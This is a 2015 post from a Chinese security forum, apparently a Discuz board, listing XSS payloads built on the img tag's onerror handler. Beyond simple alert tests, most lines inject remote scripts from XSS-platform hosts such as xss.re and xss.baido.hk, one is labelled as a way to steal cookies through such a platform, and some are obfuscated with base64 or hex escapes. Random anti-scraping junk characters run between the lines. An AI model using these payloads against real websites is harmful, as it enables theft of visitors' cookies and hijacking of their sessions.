找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1942|回复: 0
打印 上一主题 下一主题

img标签的常用几种测试手段

[复制链接]
跳转到指定楼层
楼主
发表于 2015-10-18 14:33:54 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
<img src='non-exist.jpg'onerror="alert('xss')">
# _% v9 ?  k* o; D: j0 w<img src=# onerror=alert(123)>
, Q* [  {$ l$ Z; d$ K) ?<img src=# onerror=alert(document.cookie)>
4 ]3 X" U1 }( ]下面是利用平台钓cookie的/ m9 F* Y8 x% b: v/ p
<img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>
, `( P0 T) h1 F- i- i. D; }" A1 O! m' y; ]) [. T

: ]" p9 y( h$ @- V" b" W<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>( R3 k( d+ z, @: t5 Y1 G% M( g
<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>
6 {) `. ]' C5 p7 K“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>
) I6 g# n, h4 s3 S<img src=1 onerror=jQuery.getScript("//xss.re/974")> 1 n& V5 ~, B- _. j
<img src="#">3 O. D! i3 [$ J2 D
<img src="#">
) h3 W; T* k$ U0 ~' e<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>
$ u  z9 {* ]5 Y8 }+ M* [<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">
- F8 o" r4 ^& M: ], V! a<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>1 Z% x& o- G: p& i- G4 L& j7 ]  J$ U2 L
<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>& [' G+ ~% d/ W
<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>- \3 a* A# L. R: k0 c
<img src=x width="0" height="0"></img>; X( G3 F$ ^" A- B
<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>
' E) {$ `. M! O  B) r" B7 J! n4 e- y/ }<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>
/ r7 h& R: g3 {8 p( h
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表